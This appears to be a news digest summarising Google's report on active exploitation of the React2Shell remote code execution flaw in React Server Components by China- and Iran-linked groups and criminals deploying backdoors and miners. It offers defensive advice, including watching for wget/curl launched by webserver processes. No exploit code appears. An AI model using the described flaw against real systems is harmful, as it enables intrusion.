China, Iran are having a field day with React2Shell, Google warns

Steven

China, Iran are having a field day with React2Shell, Google warns

Summary

Google’s threat intelligence team reports widespread exploitation of React2Shell (CVE-2025-55182), a maximum-severity unauthenticated remote code execution flaw in React Server Components. Multiple China-linked espionage crews, Iran-nexus actors and financially motivated criminals are using the bug to install backdoors, tunnelers and cryptocurrency miners. Several named Chinese groups (UNC6600, UNC6586, UNC6588, UNC6603, UNC6595) have been observed deploying payloads such as Minocat, Snowlight, Compood, Hisonic and Angryrebel.Linux. Additional React bugs (CVE-2025-55183, CVE-2025-55184, CVE-2025-67779) disclosed recently enable DoS and potential source-code leaks.

Key Points

  • CVE-2025-55182 (React2Shell) allows unauthenticated remote code execution in React Server Components and is actively exploited.
  • Google observed at least five additional PRC-aligned groups plus Iran-linked actors and cybercriminals abusing the flaw.
  • Observed payloads include backdoors (Snowlight, Compood, Hisonic), tunnelers (Minocat) and XMRig cryptocurrency miners.
  • Victims span cloud and on-prem infrastructure; some Chinese actors target AWS and Alibaba Cloud instances in APAC.
  • Three more React vulnerabilities were disclosed (55183, 55184, 67779) that can cause DoS or leak Server Function source code.
  • Detection recommendations: patch React Server Components, monitor for wget/curl from webserver processes and outbound connections, and hunt for IOCs and suspicious directories like $HOME/.systemd-utils.

Why should I read this?

Because this is ugly and it matters — fast. If you run React Server Components or host services in cloud VPSes, attackers are already weaponising the hole to plant backdoors and miners. Read it so you can patch and stop the nasties before they make you clean up someone else’s mess.

Context and relevance

The React2Shell exploit surfaced days after disclosure and quickly became a go-to for state-aligned espionage and opportunistic criminals alike. The speed and breadth of exploitation underline two trends: first, critical RCEs in popular libraries are instant targets; second, cloud instances and VPS-hosted infrastructure remain high-value targets for both data exfiltration and illicit mining. Organisations should treat these disclosures as urgent: patching, network egress monitoring and IOC hunting are immediate priorities.

Google’s report also highlights underground sharing of PoC scanners and tools, meaning unpatched systems are likely to be found and exploited automatically. Combine this with additional React bugs enabling DoS and secret leaks, and the risk profile for web-facing React environments is elevated.

Source

Source: https://go.theregister.com/feed/www.theregister.com/2025/12/15/react2shell_flaw_china_iran/